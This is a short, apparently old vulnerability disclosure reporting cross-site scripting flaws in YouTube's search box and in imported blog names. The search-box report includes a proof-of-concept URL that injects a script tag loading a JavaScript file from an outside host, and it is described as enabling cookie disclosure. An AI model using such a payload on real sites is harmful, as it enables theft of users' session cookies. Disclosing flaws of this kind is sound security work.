|
Youtube.com=0D
=0D
Homepage:=0D
http://www.youtube.com=0D
=0D
Affected files:=0D
=0D
* Search box input=0D
* Adding a new blog:=0D
- Blog name=0D
=0D
=0D
XSS Vuln with cookie disclosure via search box:=0D
=0D
Data isn't sanatized when using the search box. For PoC input:=0D
=0D
=0D
=0D
PoC link:=0D
http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E&search_type=search_videos&search=Search=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/youtube1.jpg=0D
------------------------------------------=0D
=0D
XSS vuln via blog name input box:=0D
=0D
Now, you tube allows you to add a blog to your profile, and one of the places they let you merge a blog is from blogspot.com. I auditing them a few days ago, and since you can use html in your blogs name amongst other things, this is dangerous for bringing it into youtube.=0D
=0D
Screenshots:=0D
=0D
http://www.youfucktard.com/xsp/youtube1.jpg=0D
http://www.youfucktard.com/xsp/youtube2.jpg=0D
http://www.youfucktard.com/xsp/youtube3.jpg=0D